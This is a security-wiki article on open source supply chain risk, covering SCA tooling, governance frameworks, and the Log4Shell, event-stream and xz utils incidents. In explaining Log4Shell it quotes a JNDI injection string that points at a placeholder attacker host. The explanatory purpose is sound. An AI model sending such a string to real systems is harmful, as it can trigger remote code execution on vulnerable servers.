open-source-security: CDA.Wiki (Print)

# Open Source Security

Definition

Open source security is the discipline of managing the security risks introduced by an organization's dependence on open source software (OSS). Open source components are used in virtually every modern application: 96% of commercial codebases contain open source, and the average enterprise application has more than 500 open source dependencies. These components are not developed, maintained, or audited by the organizations that rely on them. They are built by communities of volunteers, sometimes by a single individual, often without dedicated security resources or any formal vulnerability management process.

This creates a structural risk: an organization may have exceptional internal security practices, rigorous code review, comprehensive penetration testing, and robust access controls, yet still be critically exposed through a vulnerable component written by an anonymous volunteer who stopped maintaining the package three years ago. The software an organization ships is the sum of every component it includes, intentionally or not, directly or through transitive dependency chains that may be dozens of layers deep.

Open source security is not anti-open source. The same properties that create risk, broad adoption, transparent code, community-driven development, also create the conditions for some of the fastest vulnerability discovery and patching in software history. The risk is not the openness of open source; it is the organizational failure to systematically track, evaluate, and manage what open source components are present in production systems.

---

How It Works

The Dependency Graph Problem

When a developer adds a package to a project, they are not adding one thing. They are adding that package, all of its dependencies, and all of their dependencies, recursively. This transitive dependency tree is the true scope of an organization's open source exposure.

A Node.js project with 50 direct dependencies in package.json might resolve to 800-1,200 packages after transitive dependencies are fully resolved. Most of those packages are never inspected by the development team. Many of them are maintained by individuals operating without any organizational security program. Some of them have not received a security update in years.

Software Composition Analysis (SCA) is the category of tooling that addresses this problem. SCA tools scan an application's dependency manifest and resolved lockfile, identify all components (direct and transitive), and cross-reference each component's version against known vulnerability databases. The output is a list of vulnerable components, their CVE identifiers, CVSS scores, and (when a patched version exists) upgrade recommendations.

Leading SCA tools include Snyk, Mend (formerly WhiteSource), FOSSA, Black Duck, Dependabot (GitHub native), and Renovate. Most integrate into CI/CD pipelines and can block builds when critical vulnerabilities are detected. Grype (Anchore) and Trivy are strong open source options. These tools query NVD (National Vulnerability Database), the GitHub Advisory Database, and ecosystem-specific advisories (npm security advisories, PyPI safety database, RubyGems advisories).

The Maintenance Sustainability Problem

Many critical software components are maintained by individuals with no organizational backing and no compensation. The Heartbleed vulnerability (CVE-2014-0160) in OpenSSL, a library used to encrypt a large fraction of internet traffic, was maintained by a small team with minimal resources. The xz utils compression library, used by SSH on most Linux distributions, was maintained for years by essentially two people.

This is not an exception; it is the rule. The OpenSSF (Open Source Security Foundation) has documented the pattern extensively: components that form critical infrastructure dependencies for thousands of enterprises are often maintained by individuals who rely on their own time, personal equipment, and unpaid effort. When a critical vulnerability is found in one of these components, there may be no organization with the resources and authority to respond quickly.

The gap between organizational dependence and organizational investment in the open source components that underpin production systems is the structural root cause of most open source security incidents.

---

Why It Matters

Critical Infrastructure Runs on Open Source

Banks, hospitals, power utilities, government agencies, and defense contractors all run software that depends on open source components. The Log4j vulnerability demonstrated this concretely: a logging library maintained as a volunteer open source project by the Apache Software Foundation was embedded in virtually every Java-based enterprise application in existence. The vulnerability affected ATMs, medical devices, industrial control systems, and classified government systems simultaneously.

When a critical vulnerability is disclosed in a widely used open source component, it does not affect one organization. It affects every organization that has ever included that component, across every version, across every deployment environment. The scope of remediation required to address a single CVE in a foundational component can equal years of security work for the global economy.

Attacker Economics

The economics of open source vulnerabilities are favorable to attackers. A vulnerability in a widely used library can be weaponized once and exploited against thousands of targets. The cost to develop an exploit is fixed; the number of vulnerable targets can be measured in the millions. High-severity CVEs in popular open source components are reliably weaponized within hours of public disclosure. The window between CVE publication and active exploitation has collapsed in recent years, particularly for CVSS 9.0+ vulnerabilities.

---

Technical Details

Major Incidents

Log4Shell (CVE-2021-44228, December 2021) is the most consequential open source vulnerability in the past decade. Apache Log4j is a logging library for Java applications. The JNDI (Java Naming and Directory Interface) injection vulnerability in Log4j's message lookup feature allowed attackers to cause a vulnerable application to fetch and execute arbitrary code from a remote server simply by logging a crafted string. The attack string was as short as ${jndi:ldap://attacker.com/a}. Any input that Log4j processed (HTTP headers, form fields, usernames, search queries) was a potential attack vector.

The severity score was CVSS 10.0. Every Java application using Log4j 2.0-2.14.1 was potentially affected. Because Log4j was an extremely common dependency in the Java ecosystem, the affected population included an estimated 3 billion Java installations. NSA, CISA, the UK NCSC, and Australian ACSC issued emergency advisories. The U.S. government mandated patching for federal agencies within 48 hours. Most organizations spent weeks in emergency remediation, struggling to identify every system that used Log4j, including transitive dependencies where Log4j was not a direct project dependency.

The incident crystallized the case for SBOMs: organizations with SBOM-based inventories could identify affected systems in minutes. Organizations without them spent days or weeks in manual discovery.

event-stream npm hijacking (2018) illustrates a different attack vector: supply chain compromise through package transfer. event-stream was a popular npm package with approximately 2 million downloads per week. The original maintainer, Dominic Tarr, transferred ownership of the package to an account named "right9ctrl" after receiving a message claiming the new maintainer wanted to help maintain the project.

The new maintainer added a malicious dependency, flatmap-stream, which contained obfuscated code targeting the Copay cryptocurrency wallet application specifically. The code was designed to steal private keys from the Copay wallet when the wallet application reached a certain version. The attack was discovered by accident when a developer noticed the unusual dependency. The package had been installed by millions of projects between the compromise and discovery.

The incident demonstrated that package maintenance transfer is a realistic supply chain attack vector, that npm packages can execute arbitrary code with no review gate, and that targeting a specific downstream application through a transitive dependency is feasible. npm subsequently introduced supply chain security features including enhanced maintainer account security requirements and package provenance tracking.

xz utils backdoor (CVE-2024-3094, March 2024) is the most sophisticated supply chain attack ever publicly documented. xz utils is a compression library (liblzma) used by essentially every major Linux distribution. Because systemd links against liblzma, and openssh-server uses systemd, a backdoor in xz utils could provide remote code execution capability against SSH on affected systems.

The backdoor was introduced through a multi-year social engineering operation. Beginning in late 2021, a GitHub account named "Jia Tan" began contributing to the xz utils project. The contributions were legitimate and helpful. Over approximately two years, Jia Tan built trust with the existing maintainer, Lasse Collin (who was under significant psychological pressure from other community accounts, later suspected to be sock puppets used to manipulate the situation). Jia Tan gradually took on more responsibility for the project.

In early 2024, Jia Tan introduced a series of code changes that included a sophisticated backdoor in the build process. The backdoor targeted only specific configurations (systemd-linked builds, on x86-64 Linux, in specific distribution packages) and was designed to be non-obvious in code review. The backdoor patched the RSA key verification function in the SSH server, allowing whoever held a specific private key to authenticate to any affected system without credentials.

The backdoor was discovered in March 2024 by Andres Freund, a Microsoft engineer, who noticed that SSH logins on a Debian unstable system were consuming anomalously high CPU and creating unexplained Valgrind errors. He investigated the anomaly and eventually traced it to the xz utils compression library. The discovery was accidental; had Freund not noticed the performance anomaly and investigated it systematically, the backdoor would likely have reached stable distributions in major Linux releases.

A nation-state actor is widely suspected. The technical sophistication, the patience of a multi-year operation, and the specific targeting of SSH infrastructure are consistent with state-level resources and objectives. No attribution has been officially confirmed.

Governance Frameworks

OpenSSF Scorecard is an automated security health assessment tool for open source projects hosted on GitHub. It evaluates projects across a series of security-relevant criteria: whether the project has a security policy, whether it uses dependency pinning, whether it requires code review for pull requests, whether it has automated tests, whether it uses fuzzing, whether it has vulnerability reporting infrastructure. Each check produces a score, and the aggregate produces an overall project health score between 0 and 10. Security teams can use Scorecard data when evaluating whether to adopt a new dependency.

SLSA (Supply Chain Levels for Software Artifacts) is a Google-originated framework for securing software build pipelines. SLSA defines four levels of assurance, from basic provenance documentation (Level 1) through tamper-resistant build infrastructure with verified toolchain integrity (Level 4). SLSA addresses the question of whether a software artifact can be verified to have been produced by the process claimed, without tampering in transit or at build time.

CIS Software Supply Chain Security Guide provides control-level prescriptive guidance for securing the software supply chain, including source code management, build pipeline security, dependency management, artifact security, and deployment environment hardening.

OpenSSF's Alpha-Omega Project and Sovereign Tech Fund (Germany) are funding initiatives that address the maintenance sustainability problem directly, by paying security engineers to audit and harden critical open source projects that lack the organizational resources to do so independently. The approach acknowledges that purely process-oriented governance cannot substitute for sustained engineering investment in the most critical components.

SCA Toolchain Integration

An effective open source security program uses SCA tooling at multiple stages:

Developer workstation: IDE plugins (Snyk, Mend) surface vulnerable dependency suggestions in real time as developers add packages.
Pull request gate: SCA scan runs on every PR. New critical or high vulnerabilities introduced by dependency changes block merge.
Build pipeline: Full SCA scan on every build. Policy engine defines which vulnerability severities block the build versus generate warnings.
Continuous monitoring: After deployment, the dependency inventory (or SBOM) is monitored against live vulnerability feeds. New CVEs published against existing deployed dependencies trigger alerts.
SBOM-based tracking: SBOMs (discussed in the companion article) extend monitoring across all deployed applications, providing a queryable inventory rather than point-in-time scans.

License compliance is a parallel output of SCA scanning. Most SCA tools can flag GPL, AGPL, or other copyleft licenses in the dependency tree that may create distribution obligations, and compare them against the organization's approved license policy.

---

CDA Perspective

Open source security is a VSD domain problem at its core: every unmanaged open source dependency is a component of an organization's attack surface. The xz utils backdoor is a perfect illustration of what "surface you expose" means in practice. Every Linux system with an unpatched xz utils in its SSH stack was a surface that existed without the organization's awareness, let alone their consent.

CDA's Continuous Surface Reduction methodology addresses open source exposure through dependency management controls that include SCA scanning integrated into CI/CD pipelines, SBOM generation for all deployable artifacts, and ongoing component inventory monitoring against live CVE feeds. The CSR framework treats unscanned dependencies the same way it treats open firewall ports: as known-unknown risks that must be enumerated and assessed before they can be managed.

For organizations in the early stages of a security program, CDA prioritizes dependency management within the VSD engagement scope because the return on investment is immediate and measurable. A single SCA integration into a build pipeline can surface dozens of vulnerable dependencies in a production codebase that has never been scanned. Remediating those findings reduces real risk before any penetration test or advanced control is deployed.

CDA also advocates for organizational investment in the open source components that appear most frequently in client dependency inventories. Organizations that rely on a particular library in every one of their applications have a material interest in that library remaining well-maintained. Contributing upstream, sponsoring maintainers through GitHub Sponsors or Open Collective, and participating in OpenSSF working groups are concrete actions that improve the security of the components an organization depends on.

---

Key Takeaways

96% of commercial codebases contain open source components. The average application has more than 500 open source dependencies, most of them transitive.
Log4Shell (CVSS 10.0, December 2021) affected an estimated 3 billion Java installations. Organizations with maintained SBOMs identified affected systems in minutes; those without them spent weeks in manual discovery.
The event-stream npm hijacking (2018) showed that package ownership transfer is a viable supply chain attack vector and that malicious packages can target specific downstream applications through transitive dependencies.
The xz utils backdoor (CVE-2024-3094, 2024) involved a multi-year social engineering operation by a suspected nation-state actor to introduce a backdoor into SSH infrastructure on nearly all Linux distributions. It was discovered accidentally.
SCA (Software Composition Analysis) tooling addresses the dependency visibility problem by scanning dependency manifests against vulnerability databases and enforcing policy gates in CI/CD pipelines.
OpenSSF Scorecard, SLSA, and CIS Supply Chain Security Guide provide governance frameworks for evaluating and improving open source component security.
The maintenance sustainability problem is structural: critical infrastructure runs on packages maintained by unpaid volunteers. OpenSSF Alpha-Omega and Sovereign Tech Fund address this by funding security engineering on critical projects.
CDA's CSR methodology treats unscanned open source dependencies as unmanaged attack surface, and SCA pipeline integration is a baseline control for all client engagements in the VSD domain.

---

Sources

Chen, J., et al. (2022). Open Source Security and Risk Analysis Report. Synopsys. https://www.synopsys.com/software-integrity/resources/analyst-reports/open-source-security-risk-analysis.html
CISA. (2022). Security Advisory: Apache Log4j Vulnerability Guidance. https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance
NVD. (2021). CVE-2021-44228 Detail. NIST. https://nvd.nist.gov/vuln/detail/CVE-2021-44228
Freund, A. (2024). oss-security: backdoor in upstream xz/liblzma leading to ssh server compromise. Openwall Mailing List. https://www.openwall.com/lists/oss-security/2024/03/29/4
NVD. (2024). CVE-2024-3094 Detail. NIST. https://nvd.nist.gov/vuln/detail/CVE-2024-3094
Azeroth. (2018). I don't know what to say. GitHub issue, event-stream. https://github.com/dominictarr/event-stream/issues/116
OpenSSF. (2023). Security Scorecard. https://securityscorecards.dev/
Google. (2023). SLSA: Supply Chain Levels for Software Artifacts. https://slsa.dev/
CIS. (2022). CIS Software Supply Chain Security Guide. https://www.cisecurity.org/insights/white-papers/cis-software-supply-chain-security-guide
OpenSSF Alpha-Omega Project. (2023). https://alpha-omega.dev/
Sovereign Tech Fund. (2023). https://www.sovereigntechfund.de/